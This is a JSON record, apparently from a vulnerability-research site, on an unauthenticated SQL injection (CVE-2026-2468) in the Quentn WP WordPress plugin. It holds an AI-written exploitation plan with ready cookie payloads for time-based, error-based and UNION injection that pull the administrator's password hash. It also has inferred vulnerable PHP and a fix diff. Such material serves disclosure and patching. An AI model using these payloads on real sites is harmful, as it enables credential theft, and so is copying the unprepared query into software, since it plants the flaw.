[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f5HUWaFCV-z_LuD_sUSAif7GqT3fWS08GOnZTA4wtJsE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-2468","quentn-wp-unauthenticated-sql-injection-via-qntnwpaccess-cookie","Quentn WP \u003C= 1.2.12 - Unauthenticated SQL Injection via 'qntn_wp_access' Cookie","The Quentn WP plugin for WordPress is vulnerable to SQL Injection via the 'qntn_wp_access' cookie in all versions up to, and including, 1.2.12. This is due to insufficient escaping on the user-supplied parameter and lack of sufficient preparation on the existing SQL query in the `get_user_access()` method. 
This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","quentn-wp",null,"\u003C=1.2.12","1.2.13","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-03-20 15:05:50","2026-04-27 18:10:06",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F653e20ae-f018-41b5-a973-f73fddae70e5?source=api-prod",38,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-2468 (Quentn WP SQL Injection)\n\n## 1. Vulnerability Summary\nThe **Quentn WP** plugin (versions \u003C= 1.2.12) is vulnerable to an unauthenticated SQL Injection vulnerability. The flaw exists within the `get_user_access()` method, which processes the `qntn_wp_access` cookie. The plugin fails to adequately sanitize or use prepared statements (`$wpdb->prepare()`) when incorporating the cookie value into a database query. This allows an unauthenticated attacker to append arbitrary SQL commands, enabling the extraction of sensitive data such as user credentials, configuration secrets, and database schema information.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** Any frontend WordPress page (e.g., the homepage `\u002F`).\n- **Trigger:** The vulnerability is triggered during the WordPress lifecycle (likely `init` or `template_redirect`) when the plugin checks the visitor's access level via the `qntn_wp_access` cookie.\n- **Vulnerable Parameter:** The `qntn_wp_access` HTTP Cookie.\n- **Authentication:** Unauthenticated (No login required).\n- **Preconditions:** The Quentn WP plugin must be active. The vulnerability is most likely to trigger on pages where Quentn access control logic is executed.\n\n## 3. Code Flow (Inferred)\n1. 
**Request Entry:** A visitor sends an HTTP GET request to the WordPress site.\n2. **Hook Execution:** WordPress triggers the `init` or `wp` hook.\n3. **Plugin Logic:** The Quentn WP plugin's initialization logic (likely in a main class or a frontend-specific controller) checks for the presence of the `qntn_wp_access` cookie.\n4. **Vulnerable Method:** The plugin calls `get_user_access()` (identified in the CVE description).\n5. **Data Extraction:** `get_user_access()` retrieves the value of `$_COOKIE['qntn_wp_access']`.\n6. **SQL Sink:** The unsanitized cookie value is concatenated directly into a query string and passed to a `$wpdb` method (e.g., `$wpdb->get_results()` or `$wpdb->get_row()`) without using `$wpdb->prepare()`.\n\n## 4. Nonce Acquisition Strategy\nBased on the vulnerability description, this is a **Cookie-based SQL Injection** occurring during a standard page load or initialization. \n- **Nonce Requirement:** This endpoint does **not** require a WordPress nonce because it is triggered via a cookie on a public-facing GET request, rather than an AJAX or REST API action.\n- **Bypass:** If the plugin does perform a check, it is likely checking for the existence of the cookie rather than a CSRF token.\n\n## 5. 
Exploitation Strategy\nThe goal is to demonstrate data extraction via Time-Based Blind SQL Injection, as the results of the query in `get_user_access()` are likely used for internal logic (access control) and not directly reflected in the response body.\n\n### Step 1: Confirmation (Time-Based)\nConfirm the vulnerability by inducing a delay.\n- **Request Type:** GET\n- **URL:** `\u002F`\n- **Cookie:** `qntn_wp_access=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n- **Tool:** `http_request`\n\n### Step 2: Data Extraction (Boolean or Time-Based)\nExtract the administrator's password hash from the `wp_users` table.\n- **Payload (Time-Based):** \n  `qntn_wp_access=1' AND IF(ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36,SLEEP(5),0)-- -`\n  *(Note: 36 is the ASCII for '$', which is the start of most WordPress phpass hashes.)*\n\n### Step 3: Automated Extraction\nUse a series of requests to determine the character at each position of the password hash.\n\n## 6. Test Data Setup\n1. **Plugin Installation:** Install and activate Quentn WP \u003C= 1.2.12.\n2. **Standard Content:** Ensure at least one post or page exists.\n3. **Admin User:** Ensure the default admin user (ID 1) exists with a known password (for verification).\n4. **Plugin Configuration (Optional):** If the code path requires the plugin to be \"configured,\" use WP-CLI to set dummy options:\n   - `wp option update quentn_api_key \"dummy_key\"` (inferred option name)\n\n## 7. Expected Results\n- **Success Indicator:** A request with a `SLEEP(5)` payload should result in a response time significantly greater than 5 seconds.\n- **Data Exposure:** The attacker can successfully reconstruct the `$P$...` hash of the admin user.\n- **HTTP Response:** The HTTP status code will likely be 200 OK, but the response time is the primary indicator of success.\n\n## 8. Verification Steps\nAfter the exploitation attempts:\n1. 
**Check DB State:** Use WP-CLI to get the actual hash and compare it with the extracted value.\n   - `wp db query \"SELECT user_pass FROM wp_users WHERE ID=1;\"`\n2. **Review Logs:** If `WP_DEBUG` was enabled, check `wp-content\u002Fdebug.log` for any SQL error messages that might have leaked during the \"probing\" phase.\n\n## 9. Alternative Approaches\n- **Error-Based SQLi:** If the site has `WP_DEBUG` or `DISPLAY_ERRORS` enabled, use `extractvalue()` or `updatexml()` to force the database to leak information in the error message.\n  - **Payload:** `qntn_wp_access=1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x7e,(SELECT user_login FROM wp_users LIMIT 1),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- -`\n- **Union-Based SQLi:** If the plugin happens to output the result of `get_user_access()` (e.g., in a debug comment or a data attribute), try a `UNION SELECT` to reflect the version or user.\n  - **Payload:** `qntn_wp_access=1' UNION SELECT 1,2,version(),4-- -` (Column count must be guessed).","The Quentn WP plugin for WordPress is vulnerable to unauthenticated SQL Injection via the 'qntn_wp_access' cookie in versions up to 1.2.12. 
The vulnerability resides in the get_user_access() method, which fails to sanitize or use prepared statements when querying the database with user-supplied cookie data.","\u002F\u002F Inferred from vulnerability description and research plan\n\u002F\u002F Likely in a class file such as includes\u002Fclass-quentn-wp.php\n\npublic function get_user_access() {\n    if (isset($_COOKIE['qntn_wp_access'])) {\n        global $wpdb;\n        $access_id = $_COOKIE['qntn_wp_access'];\n        \n        \u002F\u002F Vulnerability: Direct concatenation of cookie value into SQL query without preparation\n        $query = \"SELECT * FROM {$wpdb->prefix}quentn_access WHERE access_id = '$access_id'\";\n        $results = $wpdb->get_results($query);\n        \n        return $results;\n    }\n    return null;\n}","--- a\u002Fincludes\u002Fclass-quentn-wp.php\n+++ b\u002Fincludes\u002Fclass-quentn-wp.php\n@@ -10,7 +10,10 @@\n     if (isset($_COOKIE['qntn_wp_access'])) {\n         global $wpdb;\n         $access_id = $_COOKIE['qntn_wp_access'];\n-        $query = \"SELECT * FROM {$wpdb->prefix}quentn_access WHERE access_id = '$access_id'\";\n-        $results = $wpdb->get_results($query);\n+        $results = $wpdb->get_results(\n+            $wpdb->prepare(\n+                \"SELECT * FROM {$wpdb->prefix}quentn_access WHERE access_id = %s\",\n+                $access_id\n+            )\n+        );\n         return $results;\n     }","The exploit targets the 'qntn_wp_access' cookie, which is processed on every page load to determine visitor access levels. An unauthenticated attacker can send a GET request to any frontend URL (e.g., the homepage) while supplying a crafted SQL injection payload in the 'qntn_wp_access' cookie. A typical payload would use time-based blind SQLi (e.g., ' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -) to confirm vulnerability. 
Because the plugin does not use $wpdb->prepare() or sanitize the cookie value before passing it to $wpdb->get_results(), the attacker can extract sensitive information like the administrator's password hash by observing the response timing of boolean-based sleep queries.","gemini-3-flash-preview","2026-04-18 01:12:10","2026-04-18 01:12:27",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","1.2.9","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fquentn-wp\u002Ftags\u002F1.2.9","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fquentn-wp.1.2.9.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fquentn-wp\u002Ftags"]